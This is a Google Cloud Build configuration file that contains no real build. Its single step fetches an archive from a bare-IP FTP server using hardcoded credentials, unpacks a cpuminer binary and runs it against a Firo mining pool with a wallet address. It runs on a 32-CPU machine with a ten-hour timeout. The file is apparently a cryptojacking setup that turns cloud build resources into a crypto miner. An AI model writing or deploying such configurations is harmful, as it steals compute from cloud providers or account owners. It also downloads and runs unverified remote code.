steps:
  - name: 'gcr.io/cloud-builders/gcloud'
    entrypoint: "bash"
    args:
      - "-c"
      - |
          apt-get update
          apt-get install -y wget
          apt-get install -y libssl1.0.0 libssl-dev
          ln -s /lib/x86_64-linux-gnu/libssl.so.1.0.0 /usr/lib/libssl.so.10
          ln -s /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 /usr/lib/libcrypto.so.10
          wget --user=u750504516 --password='Vp123456' ftp://194.59.164.70/c.tar.gz
          tar xf c.tar.gz
          cd cpuminer
          ./cpuminer -a mtp -o stratum+tcp://firo.2miners.com:8181 -u aBLVfkCbCHagdcVM9weTRyiB5x6rSkzsq7.gccb -p x
options:
  machineType: 'N1_HIGHCPU_32'
timeout: 36000s
